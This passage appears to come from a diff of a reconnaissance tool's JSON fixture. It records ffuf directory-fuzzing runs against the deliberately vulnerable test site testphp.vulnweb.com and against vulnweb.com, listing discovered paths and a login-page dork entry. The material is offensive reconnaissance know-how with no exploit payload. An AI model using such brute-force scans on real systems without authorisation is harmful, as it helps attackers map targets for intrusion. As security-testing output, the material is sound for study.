::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQ5ZmM=\",\"FUZZ\":\"aW1hZ2VzLw==\"},\"position\":2556,\"status\":200,\"length\":377,\"words\":128,\"lines\":9,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/images/\",\"duration\":170872602,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2571/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2580/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2596/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2617/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWRhMjY=\",\"FUZZ\":\"aW5kZXgucGhw\"},\"position\":2598,\"status\":200,\"length\":4958,\"words\":514,\"lines\":110,\"content-type\":\"text/html; charset=UTF-8\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/index.php\",\"duration\":173411136,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2623/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2624/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWRhMzE=\",\"FUZZ\":\"aW5kZXguemlw\"},\"position\":2609,\"status\":200,\"length\":2586,\"words\":9,\"lines\":2,\"content-type\":\"application/zip\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/index.zip\",\"duration\":172853957,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2629/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2645/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2658/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2674/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2686/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2706/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2720/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2737/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2748/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2765/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2787/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2796/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2818/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2831/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2848/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2867/4842] :: Job [1/1] :: 134 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2878/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2897/4842] :: Job [1/1] :: 134 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2912/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2927/4842] :: Job [1/1] :: 135 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWRiNWQ=\",\"FUZZ\":\"bG9naW4ucGhw\"},\"position\":2909,\"status\":200,\"length\":5523,\"words\":557,\"lines\":120,\"content-type\":\"text/html; charset=UTF-8\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/login.php\",\"duration\":170377254,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2932/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2946/4842] :: Job [1/1] :: 136 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2962/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2977/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2998/4842] :: Job [1/1] :: 138 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3001/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3022/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3034/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3044/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3059/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3072/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3086/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3100/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3115/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3130/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3154/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3158/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3182/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3195/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3211/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3231/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3235/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3255/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3264/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3278/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3288/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3306/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3316/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3337/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3346/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3366/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3385/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3395/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3419/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3427/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3449/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3462/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3474/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3487/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3503/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3518/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3530/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3549/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3561/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3579/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3587/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3606/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3620/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3637/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3659/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3670/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3689/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3704/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3716/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3729/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3741/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3756/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3775/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3785/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3808/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3823/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3837/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3854/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3870/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3882/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3900/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3912/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3929/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3948/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3958/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3979/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3994/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4009/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4024/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4042/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4054/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4073/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4088/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4102/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4126/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4130/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4157/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4167/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4187/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4198/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4214/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4226/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4241/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4251/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4266/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4285/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4295/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4316/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4324/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4345/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4358/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4376/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4391/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4405/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4423/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4435/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4452/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4463/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4485/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4493/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4516/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4527/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4545/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4564/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4576/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4593/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQxMWQ5\",\"FUZZ\":\"dmVuZG9yLw==\"},\"position\":4569,\"status\":200,\"length\":268,\"words\":60,\"lines\":8,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/vendor/\",\"duration\":210950848,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [4593/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4605/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4618/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4632/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4646/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4662/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4679/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4694/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4708/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4726/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4735/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4756/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4763/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4784/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4798/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4807/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4824/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4838/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n", + "time": "2024-11-13T02:38:36.658Z" } }, { - "model": "startScan.dork", - "pk": 13, + "model": "startScan.command", + "pk": 112, "fields": { - "type": "login_pages", - "url": "http://testphp.vulnweb.com/disclaimer.php" + "scan_history": 1, + "activity": 6, + "command": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://vulnweb.com/FUZZ -json", + "return_code": 0, + "output": "\n /'___\\ /'___\\ /'___\\ \n /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \n \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \n \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \n \\/_/ \\/_/ \\/___/ \\/_/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http://vulnweb.com/FUZZ\n :: Wordlist : FUZZ: /home/rengine/wordlists/fuzz-Bo0oM.txt\n :: Follow redirects : false\n :: Calibration : true\n :: Timeout : 5\n :: Threads : 30\n :: Delay : 0.05 seconds\n :: Matcher : Response status: 200,204\n________________________________________________\n\n\n\u001b[2K:: Progress: [2/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [60/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [66/4842] :: Job [1/1] :: 175 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [89/4842] :: Job [1/1] :: 251 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [119/4842] :: Job [1/1] :: 192 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [119/4842] :: Job [1/1] :: 192 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [149/4842] :: Job [1/1] :: 167 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [150/4842] :: Job [1/1] :: 141 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [179/4842] :: Job [1/1] :: 158 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [180/4842] :: Job [1/1] :: 136 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [209/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [210/4842] :: Job [1/1] :: 136 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [239/4842] :: Job [1/1] :: 151 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [242/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [269/4842] :: Job [1/1] :: 151 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [288/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [289/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [309/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [310/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [331/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [332/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [353/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [362/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [383/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [394/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [413/4842] :: Job [1/1] :: 104 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [425/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [449/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [466/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [476/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [496/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [506/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [527/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [536/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [557/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [576/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [591/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [613/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [624/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: 